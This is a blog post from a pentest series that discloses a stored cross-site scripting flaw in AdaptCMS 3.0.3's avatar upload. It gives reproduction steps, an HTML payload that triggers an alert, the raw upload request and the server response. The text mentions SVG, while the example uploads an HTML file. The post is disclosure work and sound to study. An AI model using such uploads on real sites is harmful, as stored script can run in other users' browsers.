Sunday, 22 June 2025

Friday Fun Pentest Series - 29 - Stored XSS via File Upload - adaptcmsv3.0.3

Description

- It was noted that the application file upload functionality allowed SVG files to be uploaded resulting in Stored XSS


Stored XSS via File Upload #1:

Steps to Reproduce:

  1. Login with low privilege user and visit "Profile" > "Edit Your Profile" > "Avatar"
  2. Click on "Choose File" and upload the following file


html-xss.html

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Alert Box Example</title>
    <script>
        // This function will be called when the page loads
        function showAlert() {
            alert("Hello! This is an alert box.");
        }
    </script>
</head>
<body onload="showAlert()">
    <h1>Welcome to the Alert Box Example</h1>
    <p>This page will show an alert box when loaded.</p>
</body>
</html>


// HTTP POST request uploading the XSS file

POST /adaptcms/users/edit HTTP/1.1
Host: 192.168.58.131
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0
[...]

[...]
------geckoformboundary5d089e6e18a0e8706d92f371cd6484c4
Content-Disposition: form-data; name="data[User][settings][avatar]"; filename="html-xss.html"
Content-Type: text/html

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Alert Box Example</title>
    <script>
        // This function will be called when the page loads
        function showAlert() {
            alert("Hello! This is an alert box.");
        }
    </script>
</head>
<body onload="showAlert()">
    <h1>Welcome to the Alert Box Example</h1>
    <p>This page will show an alert box when loaded.</p>
</body>
</html>
------geckoformboundary5d089e6e18a0e8706d92f371cd6484c4
Content-Disposition: form-data; name="data[_Token][fields]"


// HTTP Response

HTTP/1.1 200 OK
Date: Fri, 30 May 2025 20:15:54 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
X-Powered-By: PHP/5.6.40
Content-Length: 15400
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

[...]
<img src="/adaptcms/uploads/avatars/1_html-xss.html" class="thumbnail col-lg-2" alt="" /> <input type="hidden" name="data[User][settings][old_avatar]" value="1_html-xss.html" id="UserSettingsOldAvatar"/>     <div class="clearfix"></div>
[...]
at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Friday Fun Pentest Series - 29 - Stored XSS via File Upload - adaptcmsv3.0.3

Description - It was noted that the application file upload functionality allowed SVG files to be uploaded resulting in Stored XSS Stored XS...